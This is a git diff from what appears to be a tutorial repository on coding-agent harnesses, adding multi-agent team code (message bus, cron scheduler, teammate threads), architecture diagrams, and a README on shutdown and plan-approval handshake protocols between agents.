+ lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} [{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +# ── Background Tasks (from s13, unchanged) ── + +background_results: dict[str, str] = {} +background_lock = threading.Lock() + + +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + return any(kw in cmd for kw in + ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install"]) + + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + threading.Thread(target=worker, daemon=True).start() + + +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready + + +# ── Cron Scheduler (from s14, unchanged) ── + +DURABLE_PATH = WORKDIR / ".scheduled_tasks.json" + + +@dataclass +class CronJob: + id: str + cron: str + prompt: str + recurring: bool + durable: bool + + +scheduled_jobs: dict[str, CronJob] = {} +cron_queue: list[CronJob] = [] +cron_lock = threading.Lock() +_last_fired: dict[str, int] = {} + + +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return 
int(lo) <= value <= int(hi)
+    return value == int(field)
+
+
+def cron_matches(cron_expr: str, dt: datetime) -> bool:
+    fields = cron_expr.strip().split()
+    if len(fields) != 5:
+        return False
+    minute, hour, dom, month, dow = fields
+    dow_val = (dt.weekday() + 1) % 7
+    return all([
+        _cron_field_matches(minute, dt.minute),
+        _cron_field_matches(hour, dt.hour),
+        _cron_field_matches(dom, dt.day),
+        _cron_field_matches(month, dt.month),
+        _cron_field_matches(dow, dow_val),
+    ])
+
+
+def save_durable_jobs():
+    durable = [asdict(j) for j in scheduled_jobs.values() if j.durable]
+    DURABLE_PATH.write_text(json.dumps(durable, indent=2))
+
+
+def load_durable_jobs():
+    if not DURABLE_PATH.exists():
+        return
+    try:
+        for j in json.loads(DURABLE_PATH.read_text()):
+            job = CronJob(**j)
+            scheduled_jobs[job.id] = job
+    except Exception:
+        pass
+
+
+def schedule_job(cron: str, prompt: str, recurring: bool = True,
+                 durable: bool = True) -> CronJob:
+    job = CronJob(id=f"cron_{random.randint(0, 999999):06d}",
+                  cron=cron, prompt=prompt,
+                  recurring=recurring, durable=durable)
+    with cron_lock:
+        scheduled_jobs[job.id] = job
+        if durable:
+            save_durable_jobs()
+    return job
+
+
+def cron_scheduler_loop():
+    while True:
+        time.sleep(1)
+        now = datetime.now()
+        # Unique per calendar minute (epoch // 60). A marker built from
+        # hour*60+minute would repeat every day and suppress daily jobs.
+        minute_marker = int(now.timestamp() // 60)
+        with cron_lock:
+            for job in list(scheduled_jobs.values()):
+                if cron_matches(job.cron, now):
+                    if _last_fired.get(job.id) != minute_marker:
+                        cron_queue.append(job)
+                        _last_fired[job.id] = minute_marker
+                        print(f"  \033[35m[cron fire] {job.prompt[:40]}\033[0m")
+                        if not job.recurring:
+                            scheduled_jobs.pop(job.id, None)
+                            if job.durable:
+                                save_durable_jobs()
+
+
+def consume_cron_queue() -> list[CronJob]:
+    with cron_lock:
+        fired = list(cron_queue)
+        cron_queue.clear()
+    return fired
+
+
+load_durable_jobs()
+threading.Thread(target=cron_scheduler_loop, daemon=True).start()
+
+
+# Cron tool handlers
+def run_schedule_cron(cron: str, prompt: str,
+                      recurring: bool = True, durable: 
bool = True) -> str: + job = schedule_job(cron, prompt, recurring, durable) + print(f" \033[35m[cron] {job.id}: '{cron}'\033[0m") + return f"Scheduled {job.id}: '{cron}' → {prompt}" + + +def run_list_crons() -> str: + with cron_lock: + jobs = list(scheduled_jobs.values()) + if not jobs: + return "No cron jobs." + return "\n".join( + f" {j.id}: '{j.cron}' → {j.prompt[:40]} " + f"[{'R' if j.recurring else '1x'}, {'D' if j.durable else 'S'}]" + for j in jobs) + + +def run_cancel_cron(job_id: str) -> str: + with cron_lock: + job = scheduled_jobs.pop(job_id, None) + if not job: + return f"Job {job_id} not found" + if job.durable: + save_durable_jobs() + return f"Cancelled {job_id}" + + +# ── MessageBus (s15 new) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + """File-based message bus. Each agent has a .jsonl inbox.""" + + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"{content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() + +# Track spawned teammates +active_teammates: dict[str, bool] = {} + + +# ── Teammate Thread (s15 new) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + """Spawn a teammate agent in a background thread.""" + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. 
" + f"Send results via send_message to 'lead'.") + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send a message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + ] + sub_handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + } + + for _ in range(10): + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + # Send final summary to Lead + summary = "Done." 
+ for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role}" + + +# ── Team Tool Handlers (s15 new) ── + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + lines.append(f" [{m['from']}] {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Dispatch (shared) ── + +def execute_tool(block) -> str: + handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "schedule_cron": run_schedule_cron, "list_crons": run_list_crons, + "cancel_cron": run_cancel_cron, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + } + handler = handlers.get(block.name) + return handler(**block.input) if handler else f"Unknown: {block.name}" + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": 
{"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "schedule_cron", + "description": "Schedule a cron job (5-field expression).", + "input_schema": {"type": "object", + "properties": { + "cron": {"type": "string"}, + "prompt": {"type": "string"}, + "recurring": {"type": "boolean"}, + "durable": {"type": "boolean"}}, + "required": ["cron", "prompt"]}}, + {"name": "list_crons", + "description": "List all cron jobs.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "cancel_cron", + "description": "Cancel a cron job.", + "input_schema": {"type": "object", + "properties": {"job_id": {"type": "string"}}, + "required": ["job_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn a persistent teammate agent in a background thread.", + "input_schema": {"type": "object", + "properties": { + "name": {"type": "string"}, + "role": {"type": "string"}, + 
"prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send a message to a teammate via MessageBus.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check Lead's inbox for teammate messages.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, +] + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_cron": "cron" in text or "schedule" in text, + "has_team": "teammate" in text or "spawn" in text or "inbox" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + # Consume cron jobs + for job in consume_cron_queue(): + messages.append({"role": "user", + "content": f"[Scheduled] {job.prompt}"}) + + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + print(str(output)[:300]) + 
results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": output}) + + # Inject background results + bg = collect_background_results() + if bg: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg.items()]}) + + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s15: agent teams") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "has_cron": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms15 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + # Check inbox for teammate results after each turn + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)} messages]\033[0m") + for msg in inbox: + print(f" From {msg['from']}: {str(msg['content'])[:200]}") + print() diff --git a/s15_agent_teams/images/agent-teams-overview.en.svg b/s15_agent_teams/images/agent-teams-overview.en.svg new file mode 100644 index 000000000..f944cb126 --- /dev/null +++ b/s15_agent_teams/images/agent-teams-overview.en.svg @@ -0,0 +1,114 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Agent Teams — Lead Loop + Teammate Threads + MessageBus + + + + s10-s14 Preserved + + s15 New + + Teammate + + + + cron_queue + + + + + messages + + + + + prompt + cache + + + + + LLM call + + + + + TOOL DISPATCH + bash · read · write · task(4) · cron(3) + ★ spawn_teammate · send_message · check_inbox + + + + + + + + spawn + + + + 
MessageBus (.mailboxes/*.jsonl) + + + + + + + + + + send + send + send + + + Teammate: alice (Backend) + inbox → LLM → bash/read/write/send + Max 10 rounds → summary → BUS.send + + + Teammate: bob (Frontend) + Independent agent_loop, shared client + Thread(daemon=True) + + + Teammate: charlie (QA) + Cannot spawn other teammates + spawn → work → summary + + + + permission_request ↑ + + + Permission Bubbling: teammate → Lead + ① Teammate needs approval → BUS.send("permission_request") ② Lead check_inbox → user approval → reply approve/deny + + + + + s10-s14: prompt assembly, error recovery, task graph, background threads, cron scheduling + + s15: MessageBus + spawn_teammate_thread + send_message + check_inbox + permission bubbling + diff --git a/s15_agent_teams/images/agent-teams-overview.ja.svg b/s15_agent_teams/images/agent-teams-overview.ja.svg new file mode 100644 index 000000000..b2c82d521 --- /dev/null +++ b/s15_agent_teams/images/agent-teams-overview.ja.svg @@ -0,0 +1,114 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Agent Teams — Lead ループ + チームメイトスレッド + MessageBus + + + + s10-s14 保持 + + s15 新規 + + チームメイト + + + + cron_queue + + + + + messages + + + + + prompt + cache + + + + + LLM call + + + + + TOOL DISPATCH + bash · read · write · task(4) · cron(3) + ★ spawn_teammate · send_message · check_inbox + + + + + + + + spawn + + + + MessageBus (.mailboxes/*.jsonl) + + + + + + + + + + send + send + send + + + チームメイト: alice (Backend) + inbox → LLM → bash/read/write/send + 最大 10 ラウンド → summary → BUS.send + + + チームメイト: bob (Frontend) + 独立 agent_loop、共有 client + Thread(daemon=True) + + + チームメイト: charlie (QA) + 他のチームメイトを spawn 不可 + spawn → work → summary + + + + permission_request ↑ + + + 権限バブリング: チームメイト → Lead + ① チームメイトが承認必要 → BUS.send("permission_request") ② Lead check_inbox → ユーザー承認 → approve/deny 返信 + + + + + s10-s14:プロンプト組み立て、エラーリカバリ、タスクグラフ、バックグラウンドスレッド、cron + + s15:MessageBus + spawn_teammate_thread + send_message + check_inbox + 権限バブリング + diff --git 
a/s15_agent_teams/images/agent-teams-overview.svg b/s15_agent_teams/images/agent-teams-overview.svg new file mode 100644 index 000000000..f1639267a --- /dev/null +++ b/s15_agent_teams/images/agent-teams-overview.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Agent Teams — Lead Loop + Teammate Threads + MessageBus + + + + s10-s14 保留 + + s15 新增 + + Teammate + + + + + + cron_queue + + + + + messages + + + + + prompt + cache + + + + + LLM call + + + + + TOOL DISPATCH + bash · read · write · task(4) · cron(3) + ★ spawn_teammate · send_message · check_inbox + + + + + + + + + spawn + + + + + MessageBus (.mailboxes/*.jsonl) + + + + + + + + + + + + + + send + send + send + + + + Teammate: alice (Backend) + inbox → LLM → bash/read/write/send + 最多 10 轮 → summary → BUS.send + + + + Teammate: bob (Frontend) + 独立 agent_loop,共享 client + Thread(daemon=True) + + + + Teammate: charlie (QA) + 不能 spawn 其他 teammate + spawn → work → summary + + + + + + + + permission_request ↑ + + + 权限冒泡: teammate → Lead + ① 队友需审批 → BUS.send("permission_request") ② Lead check_inbox → 用户审批 → 回复 approve/deny + + + + + s10-s14: prompt 组装、错误恢复、任务图、后台线程、cron 调度 + + s15: MessageBus + spawn_teammate_thread + send_message + check_inbox + 权限冒泡 + diff --git a/s15_agent_teams/images/team-topology.en.svg b/s15_agent_teams/images/team-topology.en.svg new file mode 100644 index 000000000..3a0320286 --- /dev/null +++ b/s15_agent_teams/images/team-topology.en.svg @@ -0,0 +1,73 @@ + + + + + + + + + + + + + + + + + + + + Team Topology — Lead ↔ MessageBus ↔ Teammates + + + + Lead Agent + Main loop + spawn + permission decisions + check_inbox receives teammate messages + + + + Message Bus (.mailboxes/*.jsonl) + + + + Alice (Backend) + own loop → inbox → work → reply + + + Bob (Frontend) + own loop → inbox → work → reply + + + Charlie (QA) + own loop → inbox → work → reply + + + + send + + inbox + + + + + + + + + send + send + send + + + + permission_request + + + permission_request + + + Permission 
Bubbling Flow + ① Teammate needs approval → BUS.send("permission_request") ② Lead check_inbox receives + ③ User approval → Lead replies approve/deny ④ Teammate receives → continue or reject + diff --git a/s15_agent_teams/images/team-topology.ja.svg b/s15_agent_teams/images/team-topology.ja.svg new file mode 100644 index 000000000..d1ccb4d0c --- /dev/null +++ b/s15_agent_teams/images/team-topology.ja.svg @@ -0,0 +1,73 @@ + + + + + + + + + + + + + + + + + + + + Team Topology — Lead ↔ MessageBus ↔ チームメイト + + + + Lead Agent + メインループ + spawn + 権限決定 + check_inbox でチームメイトのメッセージ受信 + + + + Message Bus (.mailboxes/*.jsonl) + + + + Alice (Backend) + 独立 loop → inbox → 作業 → 返信 + + + Bob (Frontend) + 独立 loop → inbox → 作業 → 返信 + + + Charlie (QA) + 独立 loop → inbox → 作業 → 返信 + + + + send + + inbox + + + + + + + + + send + send + send + + + + permission_request + + + permission_request + + + 権限バブリングフロー + ① チームメイトが承認必要 → BUS.send("permission_request") ② Lead check_inbox で受信 + ③ ユーザー承認 → Lead が approve/deny 返信 ④ チームメイト受信 → 続行または拒否 + diff --git a/s15_agent_teams/images/team-topology.svg b/s15_agent_teams/images/team-topology.svg new file mode 100644 index 000000000..aa3624ef0 --- /dev/null +++ b/s15_agent_teams/images/team-topology.svg @@ -0,0 +1,83 @@ + + + + + + + + + + + + + + + + + + + + + + + Team Topology — Lead ↔ MessageBus ↔ Teammates + + + + Lead Agent + 主循环 + spawn + 权限决策 + check_inbox 接收队友消息 + + + + Message Bus (.mailboxes/*.jsonl) + + + + Alice (Backend) + 独立 loop → inbox → 干活 → 回复 + + + Bob (Frontend) + 独立 loop → inbox → 干活 → 回复 + + + Charlie (QA) + 独立 loop → inbox → 干活 → 回复 + + + + + send + + + inbox + + + + + + + + + + + send + send + send + + + + + permission_request + + + + permission_request + + + + 权限冒泡流程 + ① 队友需审批 → BUS.send("permission_request") ② Lead check_inbox 收到 + ③ 用户审批 → Lead 回复 approve/deny ④ 队友收到 → 继续或拒绝 + diff --git a/s16_team_protocols/README.en.md b/s16_team_protocols/README.en.md new file mode 100644 index 000000000..94b57e16b --- /dev/null +++ 
b/s16_team_protocols/README.en.md @@ -0,0 +1,205 @@ +# s16: Team Protocols — Teammates Need Agreements + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s14 → s15 → `s16` → [s17](../s17_autonomous_agents/) → s18 → s19 + +> *"Teammates need agreements"* — A single request-response pattern drives all negotiations. +> +> **Harness layer**: Protocols — Structured handshakes between agents. + +--- + +## The Problem + +In a company, firing an employee isn't slamming the table and saying "you're out." HR sends a formal notice, the employee says "OK, let me wrap up my work," finishes the handover, HR confirms. Every step has a paper trail — if something goes wrong, you can trace it. + +s15's teammates can work, but coordination is loose — Lead sends a message, teammate replies, no structured protocol. Two scenarios expose the problem: + +**Shutdown**: Lead wants Alice to shut down. Killing the thread directly → Alice's half-written file stays on disk. A handshake is needed: Lead sends a request, Alice confirms after wrapping up, then shuts down. + +**Plan approval**: Bob wants to refactor the auth module — a high-risk operation. Bob's plan should go through Lead for review first. Only after approval can Bob proceed. + +Both scenarios share the same structure: **one party sends a request, the other gives a response. Request and response are linked by the same ID.** It's not "send a message and hope they understand" — there's a state machine tracking: pending → approved / rejected. + +--- + +## The Solution + +![Team Protocols Overview](images/team-protocols-overview.en.svg) + +All s15 capabilities preserved (MessageBus, spawn_teammate, inbox polling). Three additions: **ProtocolState** (request state tracking), **dispatch_message** (route messages by type to handlers), **match_response** (link responses to requests via request_id). 
+
+Two protocols, one mechanism:
+
+| Protocol | Direction | Purpose |
+|------|------|------|
+| shutdown_request / response | Lead → Teammate | Graceful shutdown handshake |
+| plan_approval_request / response | Teammate → Lead | High-risk operations require approval first |
+
+---
+
+## How It Works
+
+### ProtocolState: The Request's "File Card"
+
+Each protocol request creates a file card recording who sent it, to whom, current status, and attached content:
+
+```python
+@dataclass
+class ProtocolState:
+    request_id: str      # Unique ID, e.g. "req_004281"
+    type: str            # "shutdown" | "plan_approval"
+    sender: str          # Initiator
+    target: str          # Recipient
+    status: str          # pending | approved | rejected
+    payload: str         # Plan text or shutdown reason
+    created_at: float    # Timestamp
+
+pending_requests: dict[str, ProtocolState] = {}
+```
+
+A file card is created when sending a request, and found via `request_id` when receiving a response to update the status.
+
+### The Four-Step Protocol Flow
+
+Using shutdown as an example, the full chain:
+
+```
+① Lead sends request
+   req_id = new_request_id()  # "req_004281"
+   pending_requests[req_id] = ProtocolState(type="shutdown", status="pending", ...)
+   BUS.send("lead", "alice", "Please shut down gracefully.",
+            "shutdown_request", {"request_id": req_id})
+
+② Teammate receives → dispatch
+   inbox = BUS.read_inbox("alice")
+   msg_type = msg["type"]  # "shutdown_request"
+   → route to handle_shutdown_request()
+
+③ Teammate responds
+   BUS.send("alice", "lead", "Shutting down.", "shutdown_response",
+            {"request_id": req_id, "approve": True})
+
+④ Lead receives response → match
+   match_response("shutdown_response", req_id, approve=True)
+   pending_requests[req_id].status = "approved"
+```
+
+`request_id` is the correlation key threading through the entire chain — the request carries it out, the response carries it back.
+
+### dispatch_message: Route by Type
+
+A teammate's inbox doesn't just receive plain messages — it also receives protocol messages.
`handle_inbox_message` dispatches by message type: + +```python +def handle_inbox_message(name, msg, messages): + msg_type = msg.get("type", "message") + req_id = msg.get("metadata", {}).get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down.", "shutdown_response", + {"request_id": req_id, "approve": True}) + return True # Stop loop + + if msg_type == "plan_approval_response": + approve = msg["metadata"].get("approve", False) + messages.append({"role": "user", + "content": "[Plan approved]" if approve else "[Plan rejected]"}) + return False # Continue loop +``` + +New protocol type = new `if` branch, no new state machine needed. + +### State Machine: pending → approved / rejected + +Both protocols share the same state transitions: + +``` +pending ──approve──→ approved +pending ──reject───→ rejected +``` + +Shutdown uses this state machine, and so does plan approval. When Lead calls `review_plan(request_id, approve=True)`: + +```python +def run_review_plan(request_id, approve, feedback=""): + state = pending_requests.get(request_id) + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, feedback, + "plan_approval_response", + {"request_id": request_id, "approve": approve}) +``` + +### Running It Together + +``` +1. Lead: "Have Alice create a file, then shut down" +2. Lead → spawn_teammate("alice", "backend", "Create config.py") +3. alice thread starts → write_file("config.py", "...") → done +4. Lead → request_shutdown("alice") + → BUS.send("shutdown_request", {request_id: "req_000142"}) +5. alice inbox receives → handle_shutdown_request → BUS.send("shutdown_response", + {request_id: "req_000142", approve: True}) +6. Lead check_inbox → match_response("req_000142", approve=True) + → pending_requests["req_000142"].status = "approved" +``` + +Complete shutdown handshake: request → confirm → shutdown. Every step traceable via `request_id`. 
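The whole handshake above fits in a self-contained sketch. This is a teaching simplification in which an in-memory list stands in for the MessageBus mailbox files (names follow this chapter; `request_shutdown` here merges the Lead-side steps):

```python
import random, time
from dataclasses import dataclass, field

@dataclass
class ProtocolState:
    request_id: str
    type: str                 # "shutdown" | "plan_approval"
    sender: str
    target: str
    status: str               # pending | approved | rejected
    payload: str
    created_at: float = field(default_factory=time.time)

pending_requests: dict[str, ProtocolState] = {}
inbox: list[dict] = []        # stands in for .mailboxes/alice.jsonl

def new_request_id() -> str:
    return f"req_{random.randint(0, 999999):06d}"

def request_shutdown(target: str) -> str:
    """Lead side: file the card, then put the request on the bus."""
    req_id = new_request_id()
    pending_requests[req_id] = ProtocolState(
        request_id=req_id, type="shutdown", sender="lead",
        target=target, status="pending", payload="")
    inbox.append({"type": "shutdown_request",
                  "metadata": {"request_id": req_id}})
    return req_id

def match_response(request_id: str, approve: bool) -> None:
    """Lead side: correlate the response back to the pending card."""
    pending_requests[request_id].status = "approved" if approve else "rejected"

req_id = request_shutdown("alice")
msg = inbox.pop(0)                       # teammate dispatches by msg["type"]
match_response(msg["metadata"]["request_id"], approve=True)
print(pending_requests[req_id].status)   # approved
```

The same card-then-correlate pattern serves plan approval unchanged; only the `type` value and the dispatch branch differ.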
+ +--- + +## Changes from s15 + +| Component | Before (s15) | After (s16) | +|------|-----------|-----------| +| Coordination | Loose text messages | Structured request-response protocols | +| Request tracking | None | ProtocolState + pending_requests dict | +| Message routing | All treated as text | dispatch_message routes by type | +| Shutdown | Natural exit or thread kill | request_id handshake mechanism | +| High-risk operations | No gating | Plan submission → Lead approval → then execute | +| New message types | message, result | + shutdown_request/response, plan_approval_request/response | +| Lead tools | 10 (s15) | + request_shutdown, submit_plan, review_plan (13) | +| Teammate tools | 4 | + submit_plan (5) | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s16_team_protocols/code.py +``` + +Try these prompts: + +1. `Spawn alice as a backend dev. Ask her to create a file. Then request her shutdown.` +2. `Spawn bob with a refactoring task. Have him submit a plan first. Then review and approve it.` + +What to observe: Is the shutdown handshake complete (request → confirm → shutdown)? Does the `pending_requests` dict transition states correctly? Is the `request_id` consistent between request and response? + +--- + +## What's Next + +In s15-s16, Lead must assign every task to each teammate. "Alice does this, Bob does that." With 10 unclaimed tasks on the board, Lead has to manually assign 10 times. + +Can teammates **check the board and claim tasks themselves**? Lead just creates tasks — teammates discover, claim, and complete them on their own. + +s17 Autonomous Agents → Self-organizing teammates, no leader assignment needed. Poll when idle, work when available. + +
+
+Deep Dive into CC Source
+
+CC's team protocol implementation (`teammateMailbox.ts:720-850`) shares the same core structure as the tutorial — the request_id + approve/reject request-response pattern. Differences include:
+
+**Shutdown protocol**: CC's shutdown is **three-way communication**. Lead sends `shutdown_request` → teammate replies `shutdown_approved` (or `shutdown_rejected` with a reason) → the system sends `teammate_terminated` to notify all parties. After shutdown is confirmed, the system auto-cleans panes (tmux/iTerm2), unassigns tasks, and removes the member from the team config.
+
+**Plan approval**: CC's `plan_approval_request` / `plan_approval_response` carry extra fields — an approval can simultaneously set `permissionMode` (e.g. "approved, but run in plan mode"), and a response can include a `feedback` string so the teammate can revise and resubmit.
+
+**Message format**: CC's protocol messages are structured JSON (with Zod schema validation), while the tutorial uses simple type + metadata dicts.
+
+**Generality**: The tutorial covers both protocols with a single FSM (pending→approved|rejected). The simplification is faithful: CC's protocol messages likewise all share the same `request_id` correlation mechanism.
+
+
+
diff --git a/s16_team_protocols/README.ja.md b/s16_team_protocols/README.ja.md
new file mode 100644
index 000000000..009d8cc68
--- /dev/null
+++ b/s16_team_protocols/README.ja.md
@@ -0,0 +1,205 @@
+# s16: Team Protocols — チームメイト間には取り決めが必要
+
+[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md)
+
+s01 → ... → s14 → s15 → `s16` → [s17](../s17_autonomous_agents/) → s18 → s19
+
+> *"チームメイト間には取り決めが必要"* — 一つの request-response パターンが全ての交渉を駆動する。
+>
+> **Harness 層**: プロトコル — Agent 間の構造化ハンドシェイク。
+
+---
+
+## 課題
+
+会社で従業員を解雇する際、「お前はクビだ」と机を叩くわけではない。HR が正式な通知を送り、従業員が「了解、引き継ぎを終わらせます」と答え、引き継ぎ完了後 HR が確認する。各ステップには書面記録があり、問題があれば遡れる。
+
+s15 のチームメイトは作業できるが、連携は緩い — Lead がメッセージを送り、チームメイトが返信するだけで、構造化されたプロトコルがない。二つのシナリオが問題を露呈する:
+
+**シャットダウン**:Lead が Alice に終了を指示したい。スレッドを直接 kill → Alice の書きかけのファイルがディスクに残る。ハンドシェイクが必要:Lead が要求を送り、Alice が引き継ぎ完了後に確認して終了。
+
+**計画承認**:Bob が認証モジュールをリファクタリングしたい — 高リスク操作。Bob の計画を Lead に見せ、承認後に実行すべき。
+
+この二つのシナリオは構造が全く同じ:**一方が要求を送り、もう一方が応答する。要求と応答は同じ ID で紐付く。** 「メッセージを送って相手が理解してくれることを願う」ではなく、状態機械で追跡:pending → approved / rejected。
+
+---
+
+## ソリューション
+
+![Team Protocols Overview](images/team-protocols-overview.ja.svg)
+
+s15 の全機能を保持(MessageBus、spawn_teammate、inbox ポーリング)。3 つの追加:**ProtocolState**(要求状態追跡)、**dispatch_message**(メッセージタイプ別ルーティング)、**match_response**(request_id で応答と要求を紐付け)。
+
+二つのプロトコル、一つの仕組み:
+
+| プロトコル | 方向 | 用途 |
